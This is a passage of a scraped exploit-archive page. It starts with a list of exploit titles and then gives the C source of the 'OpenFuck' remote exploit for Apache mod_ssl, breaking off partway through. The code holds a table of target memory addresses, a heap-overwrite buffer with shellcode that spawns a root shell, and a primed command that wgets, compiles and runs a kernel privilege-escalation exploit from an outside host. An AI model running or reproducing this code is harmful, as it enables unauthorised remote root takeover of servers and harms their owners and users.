Zenoss 3.2.1 - Remote Post-Authentication Command Execution
Zenoss 3.2.1 - Remote Authenticated Command Execution

Microweber 1.0.3 - Arbitrary File Upload Filter Bypass Remote PHP Code Execution
Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / Remote PHP Code Execution

Magento CE < 1.9.0.1 - Post-Authentication Remote Code Execution
Magento CE < 1.9.0.1 - Authenticated Remote Code Execution

Netsweeper 4.0.9 - Arbitrary File Upload and Execution
Netsweeper 4.0.9 - Arbitrary File Upload / Execution

Netsweeper 4.0.8 - Arbitrary File Upload and Execution
Netsweeper 4.0.8 - Arbitrary File Upload / Execution

EasyITSP - 'customers_edit.php' Authentication Security Bypass
EasyITSP - 'customers_edit.php' Authentication Bypass

Wolf CMS - Arbitrary File Upload and Execution
Wolf CMS - Arbitrary File Upload / Execution

Konica Minolta FTP Utility 1.00 - Post-Authentication CWD Command SEH Overflow
Konica Minolta FTP Utility 1.00 - Authenticated CWD Command SEH Overflow

GLPI 0.85.5 - Remote Code Execution (via File Upload Filter Bypass)
GLPI 0.85.5 -  Arbitrary File Upload / Filter Bypass / Remote Code Execution

Dream CMS 2.3.0 - Cross-Site Request Forgery Add Extension / Arbitrary File Upload PHP Code Execution
Dream CMS 2.3.0 - Cross-Site Request Forgery (Add Extension) / Arbitrary File Upload / PHP Code Execution

vBulletin 5.1.x - Pre-Authentication Remote Code Execution
vBulletin 5.1.x - Unauthenticated Remote Code Execution
WordPress Ninja Forms 2.7.7 Plugin - Authorization Bypass
WordPress WP to Twitter Plugin - Authorization Bypass
WordPress Ninja Forms 2.7.7 Plugin - Authentication Bypass
WordPress WP to Twitter Plugin - Authentication Bypass

Novell ServiceDesk - Authenticated File Upload
Novell ServiceDesk - Authenticated Arbitrary File Upload

Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated File Upload
Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated Arbitrary File Upload

Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal DEP + ASLR Bypass)
Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal ASLR + DEP Bypass)

phpATM 1.32 - Remote Command Execution (Arbitrary File Upload) on Windows Servers
phpATM 1.32 - Arbitrary File Upload / Remote Command Execution (Windows Servers)
vBulletin 5.x/4.x - Post-Authentication Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API
vBulletin 4.x - Post-Authentication SQL Injection in breadcrumbs via xmlrpc API
vBulletin 5.x/4.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API
vBulletin 4.x - Authenticated SQL Injection in breadcrumbs via xmlrpc API

Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Post-Authentication Remote Root Exploit (Metasploit)
Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Authenticated Remote Root Exploit (Metasploit)
Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Post-Authentication Remote Root Exploit (Metasploit) (3)
Barracuda Web Application Firewall 8.0.1.008 - Post-Authentication Remote Root Exploit (Metasploit)
Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Root Exploit (Metasploit) (3)
Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Root Exploit (Metasploit)

phpMyAdmin 4.6.2 - Post-Authentication Remote Code Execution
phpMyAdmin 4.6.2 - Authenticated Remote Code Execution

vBulletin 5.2.2 - Pre-Authentication Server Side Request Forgery (SSRF)
vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery (SSRF)

ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authorization Bypass
ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authentication Bypass
2016-09-09 05:09:09 +00:00

1296 lines
No EOL
33 KiB
C
Executable file
Raw Blame History

/*
* E-DB Note: Updating OpenFuck Exploit ~ http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
*
* OF version r00t VERY PRIV8 spabam
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
* #hackarena irc.brasnet.org
*/
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <errno.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <openssl/ssl.h>
#include <openssl/rsa.h>
#include <openssl/x509.h>
#include <openssl/evp.h>
/* update this if you add architectures */
#define MAX_ARCH 138
struct archs {
char* desc;
int func_addr; /* objdump -R /usr/sbin/httpd | grep free */
} architectures[] = {
{
"Caldera OpenLinux (apache-1.3.26)",
0x080920e0
},
{
"Cobalt Sun 6.0 (apache-1.3.12)",
0x8120f0c
},
{
"Cobalt Sun 6.0 (apache-1.3.20)",
0x811dcb8
},
{
"Cobalt Sun x (apache-1.3.26)",
0x8123ac3
},
{
"Cobalt Sun x Fixed2 (apache-1.3.26)",
0x81233c3
},
{
"Conectiva 4 (apache-1.3.6)",
0x08075398
},
{
"Conectiva 4.1 (apache-1.3.9)",
0x0808f2fe
},
{
"Conectiva 6 (apache-1.3.14)",
0x0809222c
},
{
"Conectiva 7 (apache-1.3.12)",
0x0808f874
},
{
"Conectiva 7 (apache-1.3.19)",
0x08088aa0
},
{
"Conectiva 7/8 (apache-1.3.26)",
0x0808e628
},
{
"Conectiva 8 (apache-1.3.22)",
0x0808b2d0
},
{
"Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)",
0x08095264
},
{
"Debian GNU Linux (apache_1.3.19-1)",
0x080966fc
},
{
"Debian GNU Linux (apache_1.3.22-2)",
0x08096aac
},
{
"Debian GNU Linux (apache-1.3.22-2.1)",
0x08083828
},
{
"Debian GNU Linux (apache-1.3.22-5)",
0x08083728
},
{
"Debian GNU Linux (apache_1.3.23-1)",
0x08085de8
},
{
"Debian GNU Linux (apache_1.3.24-2.1)",
0x08087d08
},
{ "Debian Linux GNU Linux 2 (apache_1.3.24-2.1)",
0x080873ac
},
{
"Debian GNU Linux (apache_1.3.24-3)",
0x08087d68
},
{
"Debian GNU Linux (apache-1.3.26-1)",
0x0080863c4
},
{
"Debian GNU Linux 3.0 Woody (apache-1.3.26-1)",
0x080863cc
},
{ "Debian GNU Linux (apache-1.3.27)",
0x0080866a3
},
{ "FreeBSD (apache-1.3.9)", 0xbfbfde00 },
{ "FreeBSD (apache-1.3.11)", 0x080a2ea8 },
{ "FreeBSD (apache-1.3.12.1.40)", 0x080a7f58 },
{ "FreeBSD (apache-1.3.12.1.40)", 0x080a0ec0 },
{ "FreeBSD (apache-1.3.12.1.40)", 0x080a7e7c },
{ "FreeBSD (apache-1.3.12.1.40_1)", 0x080a7f18 },
{ "FreeBSD (apache-1.3.12)", 0x0809bd7c },
{ "FreeBSD (apache-1.3.14)", 0xbfbfdc00 },
{ "FreeBSD (apache-1.3.14)", 0x080ab68c },
{ "FreeBSD (apache-1.3.14)", 0x0808c76c },
{ "FreeBSD (apache-1.3.14)", 0x080a3fc8 },
{ "FreeBSD (apache-1.3.14)", 0x080ab6d8 },
{ "FreeBSD (apache-1.3.17_1)", 0x0808820c },
{ "FreeBSD (apache-1.3.19)", 0xbfbfdc00 },
{ "FreeBSD (apache-1.3.19_1)", 0x0808c96c },
{ "FreeBSD (apache-1.3.20)", 0x0808cb70 },
{ "FreeBSD (apache-1.3.20)", 0xbfbfc000 },
{ "FreeBSD (apache-1.3.20+2.8.4)", 0x0808faf8 },
{ "FreeBSD (apache-1.3.20_1)", 0x0808dfb4 },
{ "FreeBSD (apache-1.3.22)", 0xbfbfc000 },
{ "FreeBSD (apache-1.3.22_7)", 0x0808d110 },
{ "FreeBSD (apache_fp-1.3.23)", 0x0807c5f8 },
{ "FreeBSD (apache-1.3.24_7)", 0x0808f8b0 },
{ "FreeBSD (apache-1.3.24+2.8.8)", 0x080927f8 },
{ "FreeBSD 4.6.2-Release-p6 (apache-1.3.26)", 0x080c432c },
{ "FreeBSD 4.6-Realease (apache-1.3.26)", 0x0808fdec },
{ "FreeBSD (apache-1.3.27)", 0x080902e4 },
{
"Gentoo Linux (apache-1.3.24-r2)",
0x08086c34
},
{
"Linux Generic (apache-1.3.14)",
0xbffff500
},
{
"Mandrake Linux X.x (apache-1.3.22-10.1mdk)",
0x080808ab
},
{
"Mandrake Linux 7.1 (apache-1.3.14-2)",
0x0809f6c4
},
{
"Mandrake Linux 7.1 (apache-1.3.22-1.4mdk)",
0x0809d233
},
{
"Mandrake Linux 7.2 (apache-1.3.14-2mdk)",
0x0809f6ef
},
{
"Mandrake Linux 7.2 (apache-1.3.14) 2",
0x0809d6c4
},
{
"Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)",
0x0809ccde
},
{
"Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)",
0x0809ce14
},
{
"Mandrake Linux 7.2 (apache-1.3.22-1.3mdk)",
0x0809d262
},
{
"Mandrake Linux 7.2 (apache-1.3.22-10.2mdk)",
0x08083545
},
{
"Mandrake Linux 8.0 (apache-1.3.19-3)",
0x0809ea98
},
{
"Mandrake Linux 8.1 (apache-1.3.20-3)",
0x0809e97c
},
{
"Mandrake Linux 8.2 (apache-1.3.23-4)",
0x08086580
},
{ "Mandrake Linux 8.2 #2 (apache-1.3.23-4)",
0x08086484
},
{ "Mandrake Linux 8.2 (apache-1.3.24)",
0x08086665
},
{ "Mandrake Linux 9 (apache-1.3.26)",
0x0808b864
},
{
"RedHat Linux ?.? GENERIC (apache-1.3.12-1)",
0x0808c0f4
},
{
"RedHat Linux TEST1 (apache-1.3.12-1)",
0x0808c0f4
},
{
"RedHat Linux TEST2 (apache-1.3.12-1)",
0x0808c0f4
},
{
"RedHat Linux GENERIC (marumbi) (apache-1.2.6-5)",
0x080d2c35
},
{
"RedHat Linux 4.2 (apache-1.1.3-3)",
0x08065bae
},
{
"RedHat Linux 5.0 (apache-1.2.4-4)",
0x0808c82c
},
{
"RedHat Linux 5.1-Update (apache-1.2.6)",
0x08092a45
},
{
"RedHat Linux 5.1 (apache-1.2.6-4)",
0x08092c2d
},
{
"RedHat Linux 5.2 (apache-1.3.3-1)",
0x0806f049
},
{
"RedHat Linux 5.2-Update (apache-1.3.14-2.5.x)",
0x0808e4d8
},
{
"RedHat Linux 6.0 (apache-1.3.6-7)",
0x080707ec
},
{
"RedHat Linux 6.0 (apache-1.3.6-7)",
0x080707f9
},
{
"RedHat Linux 6.0-Update (apache-1.3.14-2.6.2)",
0x0808fd52
},
{
"RedHat Linux 6.0 Update (apache-1.3.24)",
0x80acd58
},
{
"RedHat Linux 6.1 (apache-1.3.9-4)1",
0x0808ccc4
},
{
"RedHat Linux 6.1 (apache-1.3.9-4)2",
0x0808ccdc
},
{
"RedHat Linux 6.1-Update (apache-1.3.14-2.6.2)",
0x0808fd5d
},
{
"RedHat Linux 6.1-fp2000 (apache-1.3.26)",
0x082e6fcd
},
{
"RedHat Linux 6.2 (apache-1.3.12-2)1",
0x0808f689
},
{
"RedHat Linux 6.2 (apache-1.3.12-2)2",
0x0808f614
},
{
"RedHat Linux 6.2 mod(apache-1.3.12-2)3",
0xbffff94c
},
{
"RedHat Linux 6.2 update (apache-1.3.22-5.6)1",
0x0808f9ec
},
{
"RedHat Linux 6.2-Update (apache-1.3.22-5.6)2",
0x0808f9d4
},
{
"Redhat Linux 7.x (apache-1.3.22)",
0x0808400c
},
{
"RedHat Linux 7.x (apache-1.3.26-1)",
0x080873bc
},
{ "RedHat Linux 7.x (apache-1.3.27)",
0x08087221
},
{
"RedHat Linux 7.0 (apache-1.3.12-25)1",
0x0809251c
},
{
"RedHat Linux 7.0 (apache-1.3.12-25)2",
0x0809252d
},
{
"RedHat Linux 7.0 (apache-1.3.14-2)",
0x08092b98
},
{
"RedHat Linux 7.0-Update (apache-1.3.22-5.7.1)",
0x08084358
},
{
"RedHat Linux 7.0-7.1 update (apache-1.3.22-5.7.1)",
0x0808438c
},
{
"RedHat Linux 7.0-Update (apache-1.3.27-1.7.1)",
0x08086e41
},
{
"RedHat Linux 7.1 (apache-1.3.19-5)1",
0x0809af8c
},
{
"RedHat Linux 7.1 (apache-1.3.19-5)2",
0x0809afd9
},
{
"RedHat Linux 7.1-7.0 update (apache-1.3.22-5.7.1)",
0x0808438c
},
{
"RedHat Linux 7.1-Update (1.3.22-5.7.1)",
0x08084389
},
{
"RedHat Linux 7.1 (apache-1.3.22-src)",
0x0816021c
},
{
"RedHat Linux 7.1-Update (1.3.27-1.7.1)",
0x08086ec89
},
{
"RedHat Linux 7.2 (apache-1.3.20-16)1",
0x080994e5
},
{
"RedHat Linux 7.2 (apache-1.3.20-16)2",
0x080994d4
},
{
"RedHat Linux 7.2-Update (apache-1.3.22-6)",
0x08084045
},
{
"RedHat Linux 7.2 (apache-1.3.24)",
0x80b0938
},
{
"RedHat Linux 7.2 (apache-1.3.26)",
0x08161c16
},
{
"RedHat Linux 7.2 (apache-1.3.26-snc)",
0x8161c14
},
{
"Redhat Linux 7.2 (apache-1.3.26 w/PHP)1",
0x08269950
},
{
"Redhat Linux 7.2 (apache-1.3.26 w/PHP)2",
0x08269988
},
{
"RedHat Linux 7.2-Update (apache-1.3.27-1.7.2)",
0x08086af9
},
{
"RedHat Linux 7.3 (apache-1.3.23-11)1",
0x0808528c
},
{
"RedHat Linux 7.3 (apache-1.3.23-11)2",
0x0808525f
},
{
"RedHat Linux 7.3 (apache-1.3.27)",
0x080862e4
},
{ "RedHat Linux 8.0 (apache-1.3.27)",
0x08084c1c
},
{ "RedHat Linux 8.0-second (apache-1.3.27)",
0x0808151e
},
{ "RedHat Linux 8.0 (apache-2.0.40)",
0x08092fa4
},
{
"Slackware Linux 4.0 (apache-1.3.6)",
0x08088130
},
{
"Slackware Linux 7.0 (apache-1.3.9)",
0x080a7fc0
},
{
"Slackware Linux 7.0 (apache-1.3.26)",
0x083d37fc
},
{ "Slackware 7.0 (apache-1.3.26)2",
0x083d2232
},
{
"Slackware Linux 7.1 (apache-1.3.12)",
0x080a86a4
},
{
"Slackware Linux 8.0 (apache-1.3.20)",
0x080ae67c
},
{
"Slackware Linux 8.1 (apache-1.3.24)",
0x080b0c60
},
{
"Slackware Linux 8.1 (apache-1.3.26)",
0x080b2100
},
{
"Slackware Linux 8.1-stable (apache-1.3.26)",
0x080b0c60
},
{ "Slackware Linux (apache-1.3.27)",
0x080b1a3a
},
{
"SuSE Linux 7.0 (apache-1.3.12)",
0x0809f54c
},
{
"SuSE Linux 7.1 (apache-1.3.17)",
0x08099984
},
{
"SuSE Linux 7.2 (apache-1.3.19)",
0x08099ec8
},
{
"SuSE Linux 7.3 (apache-1.3.20)",
0x08099da8
},
{
"SuSE Linux 8.0 (apache-1.3.23)",
0x08086168
},
{
"SUSE Linux 8.0 (apache-1.3.23-120)",
0x080861c8
},
{
"SuSE Linux 8.0 (apache-1.3.23-137)",
0x080861c8
},
/* this one unchecked cause require differend shellcode */
{
"Yellow Dog Linux/PPC 2.3 (apache-1.3.22-6.2.3a)",
0xfd42630
},
};
extern int errno;
int cipher;
int ciphers;
/* the offset of the local port from be beginning of the overwrite next chunk buffer */
#define FINDSCKPORTOFS 208 + 12 + 46
unsigned char overwrite_session_id_length[] =
"AAAA" /* int master key length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master key[SSL MAX MASTER KEY LENGTH]; */
"\x70\x00\x00\x00"; /* unsigned int session id length; */
unsigned char overwrite_next_chunk[] =
"AAAA" /* int master key length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master key[SSL MAX MASTER KEY LENGTH]; */
"AAAA" /* unsigned int session id length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char session id[SSL MAX SSL SESSION ID LENGTH]; */
"AAAA" /* unsigned int sid ctx length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char sid ctx[SSL MAX SID CTX LENGTH]; */
"AAAA" /* int not resumable; */
"\x00\x00\x00\x00" /* struct sess cert st *sess cert; */
"\x00\x00\x00\x00" /* X509 *peer; */
"AAAA" /* long verify result; */
"\x01\x00\x00\x00" /* int references; */
"AAAA" /* int timeout; */
"AAAA" /* int time */
"AAAA" /* int compress meth; */
"\x00\x00\x00\x00" /* SSL CIPHER *cipher; */
"AAAA" /* unsigned long cipher id; */
"\x00\x00\x00\x00" /* STACK OF(SSL CIPHER) *ciphers; */
"\x00\x00\x00\x00\x00\x00\x00\x00" /* CRYPTO EX DATA ex data; */
"AAAAAAAA" /* struct ssl session st *prev,*next; */
"\x00\x00\x00\x00" /* Size of previous chunk */
"\x11\x00\x00\x00" /* Size of chunk, in bytes */
"fdfd" /* Forward and back pointers */
"bkbk"
"\x10\x00\x00\x00" /* Size of previous chunk */
"\x10\x00\x00\x00" /* Size of chunk, PREV INUSE is set */
/* shellcode start */
"\xeb\x0a\x90\x90" /* jump 10 bytes ahead, land at shellcode */
"\x90\x90\x90\x90"
"\x90\x90\x90\x90" /* this is overwritten with FD by the unlink macro */
/* 72 bytes findsckcode by LSD-pl */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xe7" /* movl %esp,%edi */
"\x8d\x77\x10" /* leal 0x10(%edi),%esi */
"\x89\x77\x04" /* movl %esi,0x4(%edi) */
"\x8d\x4f\x20" /* leal 0x20(%edi),%ecx */
"\x89\x4f\x08" /* movl %ecx,0x8(%edi) */
"\xb3\x10" /* movb $0x10,%bl */
"\x89\x19" /* movl %ebx,(%ecx) */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xb1\xff" /* movb $0xff,%cl */
"\x89\x0f" /* movl %ecx,(%edi) */
"\x51" /* pushl %ecx */
"\x31\xc0" /* xorl %eax,%eax */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x07" /* movb $0x07,%bl */
"\x89\xf9" /* movl %edi,%ecx */
"\xcd\x80" /* int $0x80 */
"\x59" /* popl %ecx */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x39\xd8" /* cmpl %ebx,%eax */
"\x75\x0a" /* jne <findsckcode+54> */
"\x66\xb8\x12\x34" /* movw $0x1234,%bx */
"\x66\x39\x46\x02" /* cmpw %bx,0x2(%esi) */
"\x74\x02" /* je <findsckcode+56> */
"\xe2\xe0" /* loop <findsckcode+24> */
"\x89\xcb" /* movl %ecx,%ebx */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xb1\x03" /* movb $0x03,%cl */
"\x31\xc0" /* xorl %eax,%eax */
"\xb0\x3f" /* movb $0x3f,%al */
"\x49" /* decl %ecx */
"\xcd\x80" /* int $0x80 */
"\x41" /* incl %ecx */
"\xe2\xf6" /* loop <findsckcode+62> */
/* 10 byte setresuid(0,0,0); by core */
"\x31\xc9" /* xor %ecx,%ecx */
"\xf7\xe1" /* mul %ecx,%eax */
"\x51" /* push %ecx */
"\x5b" /* pop %ebx */
"\xb0\xa4" /* mov $0xa4,%al */
"\xcd\x80" /* int $0x80 */
/* bigger shellcode added by spabam */
/* "\xB8\x2F\x73\x68\x23\x25\x2F\x73\x68\xDC\x50\x68\x2F\x62\x69"
"\x6E\x89\xE3\x31\xC0\x50\x53\x89\xE1\x04\x0B\x31\xD2\xCD\x80"
*/
/* 24 bytes execl("/bin/sh", "/bin/sh", 0); by LSD-pl */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80"; /* int $0x80 */
/* read and write buffer*/
#define BUFSIZE 16384
/* hardcoded protocol stuff */
#define CHALLENGE_LENGTH 16
#define RC4_KEY_LENGTH 16 /* 128 bits */
#define RC4_KEY_MATERIAL_LENGTH (RC4_KEY_LENGTH*2)
/* straight from the openssl source */
#define n2s(c,s) ((s=(((unsigned int)(c[0]))<< 8)| (((unsigned int)(c[1])) )),c+=2)
#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), c[1]=(unsigned char)(((s) )&0xff)),c+=2)
/* we keep all SSL2 state in this structure */
typedef struct {
int sock;
/* client stuff */
unsigned char challenge[CHALLENGE_LENGTH];
unsigned char master_key[RC4_KEY_LENGTH];
unsigned char key_material[RC4_KEY_MATERIAL_LENGTH];
/* connection id - returned by the server */
int conn_id_length;
unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH];
/* server certificate */
X509 *x509;
/* session keys */
unsigned char* read_key;
unsigned char* write_key;
RC4_KEY* rc4_read_key;
RC4_KEY* rc4_write_key;
/* sequence numbers, used for MAC calculation */
int read_seq;
int write_seq;
/* set to 1 when the SSL2 handshake is complete */
int encrypted;
} ssl_conn;
#define COMMAND1 "TERM=xterm; export TERM=xterm; exec bash -i\n"
#define COMMAND2 "unset HISTFILE; cd /tmp; wget http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"
long getip(char *hostname) {
struct hostent *he;
long ipaddr;
if ((ipaddr = inet_addr(hostname)) < 0) {
if ((he = gethostbyname(hostname)) == NULL) {
perror("gethostbyname()");
exit(-1);
}
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}
/* mixter's code w/enhancements by core */
int sh(int sockfd) {
char snd[1024], rcv[1024];
fd_set rset;
int maxfd, n;
/* Priming commands */
strcpy(snd, COMMAND1 "\n");
write(sockfd, snd, strlen(snd));
strcpy(snd, COMMAND2 "\n");
write(sockfd, snd, strlen(snd));
/* Main command loop */
for (;;) {
FD_SET(fileno(stdin), &rset);
FD_SET(sockfd, &rset);
maxfd = ( ( fileno(stdin) > sockfd )?fileno(stdin):sockfd ) + 1;
select(maxfd, &rset, NULL, NULL, NULL);
if (FD_ISSET(fileno(stdin), &rset)) {
bzero(snd, sizeof(snd));
fgets(snd, sizeof(snd)-2, stdin);
write(sockfd, snd, strlen(snd));
}
if (FD_ISSET(sockfd, &rset)) {
bzero(rcv, sizeof(rcv));
if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) {
printf("Good Bye!\n");
return 0;
}
if (n < 0) {
perror("read");
return 1;
}
fputs(rcv, stdout);
fflush(stdout); /* keeps output nice */
}
} /* for(;;) */
}
/* Returns the local port of a connected socket */
int get_local_port(int sock)
{
struct sockaddr_in s_in;
unsigned int namelen = sizeof(s_in);
if (getsockname(sock, (struct sockaddr *)&s_in, &namelen) < 0) {
printf("Can't get local port: %s\n", strerror(errno));
exit(1);
}
return s_in.sin_port;
}
/* Connect to a host */
int connect_host(char* host, int port)
{
struct sockaddr_in s_in;
int sock;
s_in.sin_family = AF_INET;
s_in.sin_addr.s_addr = getip(host);
s_in.sin_port = htons(port);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) <= 0) {
printf("Could not create a socket\n");
exit(1);
}
if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) {
printf("Connection to %s:%d failed: %s\n", host, port, strerror(errno));
exit(1);
}
return sock;
}
/* Create a new ssl conn structure and connect to a host */
ssl_conn* ssl_connect_host(char* host, int port)
{
ssl_conn* ssl;
if (!(ssl = (ssl_conn*) malloc(sizeof(ssl_conn)))) {
printf("Can't allocate memory\n");
exit(1);
}
/* Initialize some values */
ssl->encrypted = 0;
ssl->write_seq = 0;
ssl->read_seq = 0;
ssl->sock = connect_host(host, port);
return ssl;
}
/* global buffer used by the ssl result() */
char res_buf[30];
/* converts an SSL error code to a string */
char* ssl_error(int code) {
switch (code) {
case 0x00: return "SSL2 PE UNDEFINED ERROR (0x00)";
case 0x01: return "SSL2 PE NO CIPHER (0x01)";
case 0x02: return "SSL2 PE NO CERTIFICATE (0x02)";
case 0x04: return "SSL2 PE BAD CERTIFICATE (0x03)";
case 0x06: return "SSL2 PE UNSUPPORTED CERTIFICATE TYPE (0x06)";
default:
sprintf(res_buf, "%02x", code);
return res_buf;
}
}
/* read len bytes from a socket. boring. */
int read_data(int sock, unsigned char* buf, int len)
{
int l;
int to_read = len;
do {
if ((l = read(sock, buf, to_read)) < 0) {
printf("Error in read: %s\n", strerror(errno));
exit(1);
}
to_read -= len;
} while (to_read > 0);
return len;
}
/* reads an SSL packet and decrypts it if necessery */
int read_ssl_packet(ssl_conn* ssl, unsigned char* buf, int buf_size)
{
int rec_len, padding;
read_data(ssl->sock, buf, 2);
if ((buf[0] & 0x80) == 0) {
/* three byte header */
rec_len = ((buf[0] & 0x3f) << 8) | buf[1];
read_data(ssl->sock, &buf[2], 1);
padding = (int)buf[2];
}
else {
/* two byte header */
rec_len = ((buf[0] & 0x7f) << 8) | buf[1];
padding = 0;
}
if ((rec_len <= 0) || (rec_len > buf_size)) {
printf("read_ssl_packet: Record length out of range (rec_len = %d)\n", rec_len);
exit(1);
}
read_data(ssl->sock, buf, rec_len);
if (ssl->encrypted) {
if (MD5_DIGEST_LENGTH + padding >= rec_len) {
if ((buf[0] == SSL2_MT_ERROR) && (rec_len == 3)) {
/* the server didn't switch to encryption due to an error */
return 0;
}
else {
printf("read_ssl_packet: Encrypted message is too short (rec_len = %d)\n", rec_len);
exit(1);
}
}
/* decrypt the encrypted part of the packet */
RC4(ssl->rc4_read_key, rec_len, buf, buf);
/* move the decrypted message in the beginning of the buffer */
rec_len = rec_len - MD5_DIGEST_LENGTH - padding;
memmove(buf, buf + MD5_DIGEST_LENGTH, rec_len);
}
if (buf[0] == SSL2_MT_ERROR) {
if (rec_len != 3) {
printf("Malformed server error message\n");
exit(1);
}
else {
return 0;
}
}
return rec_len;
}
/* send an ssl packet, encrypting it if ssl->encrypted is set */
void send_ssl_packet(ssl_conn* ssl, unsigned char* rec, int rec_len)
{
unsigned char buf[BUFSIZE];
unsigned char* p;
int tot_len;
MD5_CTX ctx;
int seq;
if (ssl->encrypted)
tot_len = rec_len + MD5_DIGEST_LENGTH; /* RC4 needs no padding */
else
tot_len = rec_len;
if (2 + tot_len > BUFSIZE) {
printf("send_ssl_packet: Record length out of range (rec_len = %d)\n", rec_len);
exit(1);
}
p = buf;
s2n(tot_len, p);
buf[0] = buf[0] | 0x80; /* two byte header */
if (ssl->encrypted) {
/* calculate the MAC */
seq = ntohl(ssl->write_seq);
MD5_Init(&ctx);
MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH);
MD5_Update(&ctx, rec, rec_len);
MD5_Update(&ctx, &seq, 4);
MD5_Final(p, &ctx);
p+=MD5_DIGEST_LENGTH;
memcpy(p, rec, rec_len);
/* encrypt the payload */
RC4(ssl->rc4_write_key, tot_len, &buf[2], &buf[2]);
}
else {
memcpy(p, rec, rec_len);
}
send(ssl->sock, buf, 2 + tot_len, 0);
/* the sequence number is incremented by both encrypted and plaintext packets
*/
ssl->write_seq++;
}
/* Send a CLIENT HELLO message to the server */
void send_client_hello(ssl_conn *ssl)
{
int i;
unsigned char buf[BUFSIZE] =
"\x01" /* client hello msg */
"\x00\x02" /* client version */
"\x00\x18" /* cipher specs length */
"\x00\x00" /* session id length */
"\x00\x10" /* challenge length */
"\x07\x00\xc0\x05\x00\x80\x03\x00" /* cipher specs data */
"\x80\x01\x00\x80\x08\x00\x80\x06"
"\x00\x40\x04\x00\x80\x02\x00\x80"
""; /* session id data */
/* generate CHALLENGE LENGTH bytes of challenge data */
for (i = 0; i < CHALLENGE_LENGTH; i++) {
ssl->challenge[i] = (unsigned char) (rand() >> 24);
}
memcpy(&buf[33], ssl->challenge, CHALLENGE_LENGTH);
send_ssl_packet(ssl, buf, 33 + CHALLENGE_LENGTH);
}
/* Get a SERVER HELLO response from the server */
void get_server_hello(ssl_conn* ssl)
{
unsigned char buf[BUFSIZE];
unsigned char *p, *end;
int len;
int server_version, cert_length, cs_length, conn_id_length;
int found;
if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
exit(1);
}
if (len < 11) {
printf("get_server_hello: Packet too short (len = %d)\n", len);
exit(1);
}
p = buf;
if (*(p++) != SSL2_MT_SERVER_HELLO) {
printf("get_server_hello: Expected SSL2 MT SERVER HELLO, got %x\n", (int)p[-1]);
exit(1);
}
if (*(p++) != 0) {
printf("get_server_hello: SESSION-ID-HIT is not 0\n");
exit(1);
}
if (*(p++) != 1) {
printf("get_server_hello: CERTIFICATE-TYPE is not SSL CT X509 CERTIFICATE\n");
exit(1);
}
n2s(p, server_version);
if (server_version != 2) {
printf("get_server_hello: Unsupported server version %d\n", server_version);
exit(1);
}
n2s(p, cert_length);
n2s(p, cs_length);
n2s(p, conn_id_length);
if (len != 11 + cert_length + cs_length + conn_id_length) {
printf("get_server_hello: Malformed packet size\n");
exit(1);
}
/* read the server certificate */
ssl->x509 = NULL;
ssl->x509=d2i_X509(NULL,&p,(long)cert_length);
if (ssl->x509 == NULL) {
printf("get server hello: Cannot parse x509 certificate\n");
exit(1);
}
if (cs_length % 3 != 0) {
printf("get server hello: CIPHER-SPECS-LENGTH is not a multiple of 3\n");
exit(1);
}
found = 0;
for (end=p+cs_length; p < end; p += 3) {
if ((p[0] == 0x01) && (p[1] == 0x00) && (p[2] == 0x80))
found = 1; /* SSL CK RC4 128 WITH MD5 */
}
if (!found) {
printf("get server hello: Remote server does not support 128 bit RC4\n");
exit(1);
}
if (conn_id_length > SSL2_MAX_CONNECTION_ID_LENGTH) {
